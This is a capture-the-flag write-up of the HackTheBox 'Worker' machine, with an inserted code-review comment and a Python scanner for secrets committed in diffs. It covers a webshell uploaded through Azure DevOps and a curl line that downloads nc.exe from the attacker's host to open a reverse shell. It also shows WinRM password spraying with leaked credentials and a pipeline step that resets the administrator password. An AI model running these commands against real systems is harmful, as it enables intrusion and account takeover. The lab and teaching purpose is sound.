
HackTheBox - Worker

Worker was an interesting 30 point box created by ekenas that introduces some cool technologies such as SVN and Azure Devops.

User.txt

Nmap


A quick nmap scan reveals the following ports and services:

# nmap -sT --min-rate 3000 -p- 10.10.10.203

PORT     STATE SERVICE
80/tcp   open  http
3690/tcp open  svn
5985/tcp open  wsman
# nmap -sV -sC -p 80,3690,5985 10.10.10.203                      

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open  svnserve Subversion
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


HTTP


Checking out http://10.10.10.203/ we’re presented with the standard default IIS web page:


SVN


Apache Subversion is a software versioning and revision control system distributed as open source under the Apache License. Software developers use Subversion to maintain current and historical versions of files such as source code, web pages, and documentation.

We can query the SVN service running on the server using the svn command:

# svn info svn://10.10.10.203:3690
Path: .
URL: svn://10.10.10.203
Relative URL: ^/
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 5
Last Changed Date: 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020)

Common commands such as cat and ls are also supported:

# svn ls svn://10.10.10.203:3690
dimension.worker.htb/
moved.txt
# svn cat svn://10.10.10.203:3690/moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb

// The Worker team :)

Checking out http://devops.worker.htb we’re prompted to login:


We obviously need credentials, let’s continue enumerating the SVN server:

# svn ls svn://10.10.10.203:3690/dimension.worker.htb/ 
LICENSE.txt
README.txt
assets/
images/
index.html

There appears to be a site running at dimension.worker.htb, so I decided to see if there was anything interesting there. Clicking on the Work tab presents you with the following page:


Each link will attempt to send you to a different subdomain. I downloaded the page with wget and grepped out the linked subdomains:

# cat index.html | grep -Eo "(http|https)://[a-zA-Z0-9./?=_%:-]*" | sort -u
http://alpha.worker.htb/
http://cartoon.worker.htb/
http://lens.worker.htb/
http://solid-state.worker.htb/
http://spectral.worker.htb/
http://story.worker.htb/

There’s not much to see on any of them, but I did make a note of them as they may come in handy later on.


SVN Log


The svn log command shows log messages from the repository:

# svn log svn://10.10.10.203:3690/ -v                                         
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line
Changed paths:                                               
   A /moved.txt                                                        
                                                                
Added note that repo has been migrated                                      
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line
Changed paths:                                         
   D /deploy.ps1

deploy.ps1 stands out immediately: developers tend to make the mistake of hardcoding credentials in deployment scripts, and deleting the file in r4 does not remove it from the repository history. We can view the changes made in the revision that added it using the following command:

# svn diff svn://10.10.10.203:3690/ -c 2
Index: deploy.ps1
===================================================================
--- deploy.ps1  (nonexistent)
+++ deploy.ps1  (revision 2)
@@ -0,0 +1,6 @@
+$user = "nathen" 
+$plain = "wendel98"
+$pwd = ($plain | ConvertTo-SecureString)
+$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
+$args = "Copy-Site.ps1"
+Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
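Review bot: the hunk commits a plaintext password to version control (`$plain = "wendel98"`), and the later deletion of deploy.ps1 in r4 does not undo that: `svn diff -c 2` still returns it, as shown here. The credential belongs in a secret store or an encrypted standard string read at run time, never in the script body. Separately, `$plain | ConvertTo-SecureString` without `-AsPlainText -Force` expects an encrypted standard string and will fail on a plain password, and `$pwd` and `$args` shadow PowerShell automatic variables, so they should be renamed.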

We can see that credentials were added in order to run the Copy-Site.ps1 script.
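As an added example, not part of the original post or the project: a check a repository owner could run over `svn diff` output (or any unified diff, for instance from a pre-commit hook) to catch the deploy.ps1 mistake before it lands. It parses the hunk headers so each finding carries the line number in the new revision; the secret-name keywords and the ConvertTo-SecureString pattern are my assumptions, constructed for this illustration.

```python
import re

# Constructed sample input: the deploy.ps1 hunk that `svn diff -c 2` returned above.
SAMPLE_DIFF = """\
Index: deploy.ps1
===================================================================
--- deploy.ps1  (nonexistent)
+++ deploy.ps1  (revision 2)
@@ -0,0 +1,6 @@
+$user = "nathen"
+$plain = "wendel98"
+$pwd = ($plain | ConvertTo-SecureString)
+$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
+$args = "Copy-Site.ps1"
+Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
"""

HUNK = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@")
# A quoted literal assigned to a variable whose name suggests a credential (assumed keyword list).
SECRET_ASSIGN = re.compile(
    r"^\$?(?P<name>\w*(?:pass|pwd|plain|secret|token|cred)\w*)\s*=\s*['\"](?P<value>[^'\"]+)['\"]", re.I)
# A plaintext value being wrapped into a SecureString inside the script itself.
SECURE_WRAP = re.compile(r"ConvertTo-SecureString", re.I)


def scan_diff(diff_text):
    """Walk a unified diff; return (file, new-file line, kind, detail) per flagged added line."""
    findings = []
    path, new_line = "?", 0
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):
            path = raw[4:].split()[0]            # "+++ deploy.ps1  (revision 2)" -> deploy.ps1
            continue
        hunk = HUNK.match(raw)
        if hunk:
            new_line = int(hunk.group(1))        # first new-file line number of this hunk
            continue
        if raw.startswith(("-", "\\")):          # removed lines and "\ No newline" markers
            continue                             # do not exist in the new revision
        if raw.startswith("+"):
            line = raw[1:].strip()
            assign = SECRET_ASSIGN.match(line)
            if assign:
                findings.append((path, new_line, "plaintext secret literal",
                                 f"{assign['name']} = {assign['value']!r}"))
            elif SECURE_WRAP.search(line):
                findings.append((path, new_line, "plaintext wrapped in SecureString", line))
        new_line += 1                            # added and context lines both advance
    return findings
```

Running `scan_diff(SAMPLE_DIFF)` flags line 2 (the literal password) and line 3 (the in-script SecureString conversion) of deploy.ps1; the `$user` and `$args` assignments are not reported.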


Devops


With valid credentials we can now login to the devops.worker.htb portal:


Clicking on the SmartHotel360 project leads us to the overview page:


Checking out the Repos tab, you can see all the repositories available to us within the portal; they appear to correspond to the subdomains we discovered earlier on the dimension.worker.htb site:


However, if you attempt to upload a webshell to one you’ll be greeted with the following error message:



Webshell Upload


As we can’t just drop a webshell into a repo and access it on the site, the following steps are required:

1. Create new work item


A Test Case will do fine; be sure to give it a name and then click Save & Close:


2. Create a new branch

Give it a name and select the work item you created in the last step from the Work items to link dropdown:


3. Upload webshell to new branch

I used the aspx webshell located at /usr/share/webshells/aspx/cmdasp.aspx on Kali and uploaded it to the repo:


4. Create a new pull request

Select the following link after uploading the webshell:


Leave the following as is and click Create:


5. Approve and Complete the pull request

Click the Approve button in the top right corner:


Once that’s done, click Complete and then Complete merge:



Webshell to Netcat


After finishing the previous steps the webshell will be available at your target subdomain, in this instance http://spectral.worker.htb/cmdasp.aspx:


Upgrading the webshell to a netcat reverse shell is trivial. First, serve the nc.exe binary:

# python3 -m http.server 80

Then use curl from the webshell to download and execute nc.exe:

curl http://10.10.14.122/nc.exe -o C:\programdata\nc.exe && C:\programdata\nc.exe 10.10.14.122 443 -e cmd.exe

And listen for the incoming connection:

# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.122] from (UNKNOWN) [10.10.10.203] 50976
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool


svnrepos


Enumerating the file system and the available drives, you’ll come across a svnrepos directory:

c:\>fsutil fsinfo drives
fsutil fsinfo drives

Drives: C:\ W:\ 
W:\>dir
dir
 Volume in drive W is Work
 Volume Serial Number is E82A-AEA8

 Directory of W:\

2020-06-16  17:59    <DIR>          agents
2020-03-28  14:57    <DIR>          AzureDevOpsData
2020-04-03  10:31    <DIR>          sites
2020-06-20  15:04    <DIR>          svnrepos
               0 File(s)              0 bytes
               4 Dir(s)  18766782464 bytes free

The conf directory under svnrepos contained an interesting passwd file holding numerous username and password combinations:

W:\svnrepos\www\conf>dir
dir
 Volume in drive W is Work
 Volume Serial Number is E82A-AEA8

 Directory of W:\svnrepos\www\conf

2020-06-20  14:30    <DIR>          .
2020-06-20  14:30    <DIR>          ..
2020-06-20  10:29             1112 authz
2020-06-20  10:29               904 hooks-env.tmpl
2020-06-20  14:27             1031 passwd
2020-04-04  19:51             4454 svnserve.conf
               4 File(s)          7501 bytes
               2 Dir(s)  18766782464 bytes free
W:\svnrepos\www\conf>type passwd
type passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday


Password spraying


As crackmapexec wasn’t working (shock), I used the winrm_login Metasploit module to see if any of the credential combinations succeed at logging into the winrm service on the host.

First I copied the username/password combinations into a creds file in vim, then removed the = on each line:

:%s/=//g

Running the module with the user/pass file option, we get a positive hit for robisl / wolves11:

msf6 auxiliary(scanner/winrm/winrm_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\nathen:wendel98 (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\nichin:fqerfqerf (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\nichin:asifhiefh (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\noahip:player (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\nuahip:wkjdnw (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\oakhol:bxwdjhcue (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\owehol:supersecret (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\paihol:painfulcode (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\parhol:gitcommit (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\pathop:iliketomoveit (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\pauhor:nowayjose (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\payhos:icanjive (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\perhou:elvisisalive (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\peyhou:ineedvacation (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\phihou:pokemon (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\quehub:pickme (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\quihud:kindasecure (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\rachul:guesswho (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\raehun:idontknow (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\ramhun:thisis (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\ranhut:getting (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\rebhyd:rediculous (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\reeinc:iagree (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\reeing:tosomepoint (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\reiing:isthisenough (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\renipr:dummy (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\rhiire:users (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\riairv:canyou (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\ricisa:seewhich (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\robish:onesare (Incorrect: )
[+] 10.10.10.203:5985 - Login Successful: WORKSTATION\robisl:wolves11
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\robive:andwhich (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\ronkay:onesare (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\rubkei:the (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\rupkel:sheeps (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\ryakel:imtired (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\sabken:drjones (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\samken:aqua (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\sapket:hamburger (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\sarkil:friday (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Flag


Logging in via winrm we get the user flag:

# evil-winrm -i 10.10.10.203 -u robisl -p wolves11

*Evil-WinRM* PS C:\Users\robisl\Documents> whoami
worker\robisl

*Evil-WinRM* PS C:\Users\robisl\desktop> type user.txt
ef2ddf...



Root.txt

Devops PowerShell


Logging into the devops.worker.htb site as robisl you’ll be presented with the following page:


We can get code execution by creating a new Azure Pipeline and utilising a CmdLine task, using a YAML file to execute a system command of our choosing.


1. Create new Pipeline

In the left tab click on Pipeline then create a new Pipeline and select Azure Repos Git:


Then click the PartsUnlimited repo.

2. Starter Pipeline

At the next page scroll down and select Starter pipeline:


3. Review pipeline YAML

Add the following code into the YAML file:

steps:
- script: net user administrator P@ssword1!
  displayName: 'run a one line script'


Then click Save and run in the top right corner, enter a new branch name, and click Save and run again in the window that pops up:


Admin


Once you’ve completed the previous steps you’ll be presented with the following window that confirms all tasks executed successfully:


Flag


We can simply login as administrator with the new password and get the root flag:

# evil-winrm -i 10.10.10.203 -u administrator -p P@ssword1!

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
worker\administrator

*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
262a80...
This post is licensed under CC BY 4.0 by the author.